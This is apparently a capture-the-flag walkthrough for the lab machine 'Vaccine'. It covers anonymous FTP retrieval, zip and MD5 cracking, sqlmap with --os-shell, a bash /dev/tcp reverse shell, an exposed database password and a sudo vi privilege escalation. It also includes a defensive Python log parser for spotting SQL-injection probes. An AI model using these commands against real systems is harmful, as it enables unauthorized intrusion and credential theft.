Vaccine

#Linux #FTP #SQL #SUID

nmap -sV -sC <target_ip>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-19 00:59 WIB
Nmap scan report for <target_ip>
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.15.153
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.13 seconds

ftp <target_ip>
Name: anonymous
Password: (empty)
ftp> ls
ftp> get backup.zip
zip2john backup.zip > cracked
john cracked
hashid 2cb42f8734ea607eefed3b70af13bbd3
echo 2cb42f8734ea607eefed3b70af13bbd3 > hash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
sqlmap -u 'http://<target_ip>/dashboard.php?search=a' --cookie="PHPSESSID=tra9r85r0n2sfddee3h7h0l1l4"
sqlmap -u 'http://<target_ip>/dashboard.php?search=a' --cookie="PHPSESSID=tra9r85r0n2sfddee3h7h0l1l4" --os-shell
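From the defender's side, an added example that is not part of this write-up: it reads Apache combined-format access log lines and flags requests that look like the probing the two sqlmap runs above leave behind on /dashboard.php's search parameter. The log lines are constructed, and the pattern list and the sqlmap User-Agent check are assumptions, not anything recovered from the box.

```python
from __future__ import annotations
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Apache "combined" log layout: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Metacharacters and keywords that rarely belong in a legitimate search term (assumed list).
SQLI_HINTS = re.compile(
    r"('|\"|--|/\*|;|\bunion\b|\bselect\b|\bpg_sleep\(|\bor\b\s+\d+=\d+)",
    re.IGNORECASE,
)

def suspicious(line: str) -> tuple[str, str] | None:
    """Return (client_ip, reason) when a request looks like SQLi probing of the
    `search` parameter of /dashboard.php; None for anything else or unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    if url.path != "/dashboard.php":
        return None
    # parse_qs URL-decodes, so %27 (') and %3D (=) are visible to the pattern.
    if any(SQLI_HINTS.search(v) for v in parse_qs(url.query).get("search", [])):
        return m["ip"], "sql metacharacters in search="
    if "sqlmap" in m["ua"].lower():
        return m["ip"], "sqlmap user-agent"
    return None

def offenders(lines) -> dict[str, int]:
    """Count flagged requests per client IP, for alerting or blocking decisions."""
    hits = Counter()
    for line in lines:
        res = suspicious(line)
        if res:
            hits[res[0]] += 1
    return dict(hits)

SAMPLE_LOG = [  # constructed lines, not real traffic from the box
    '10.10.15.153 - - [19/Feb/2022:00:59:01 +0700] "GET /dashboard.php?search=a HTTP/1.1" 200 3051 "-" "Mozilla/5.0"',
    '10.10.15.153 - - [19/Feb/2022:00:59:02 +0700] "GET /dashboard.php?search=a%27%20AND%201%3D1-- HTTP/1.1" 200 3051 "-" "Mozilla/5.0"',
    '10.10.15.153 - - [19/Feb/2022:00:59:03 +0700] "GET /dashboard.php?search=a HTTP/1.1" 200 3051 "-" "sqlmap/1.6"',
    '10.10.14.2 - - [19/Feb/2022:01:00:00 +0700] "GET /dashboard.php?search=elixir HTTP/1.1" 200 2900 "-" "Mozilla/5.0"',
]
```

Running `offenders(SAMPLE_LOG)` attributes both probing requests to 10.10.15.153 and leaves the ordinary search from 10.10.14.2 unflagged.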

start a listener

sudo nc -lvnp 443
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

database credentials found in /var/www/html/dashboard.php:

user=postgres
password=P@s5w0rd!

ssh postgres@<target_ip>

https://gtfobins.github.io/gtfobins/vi/#sudo

sudo -l
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell
whoami

done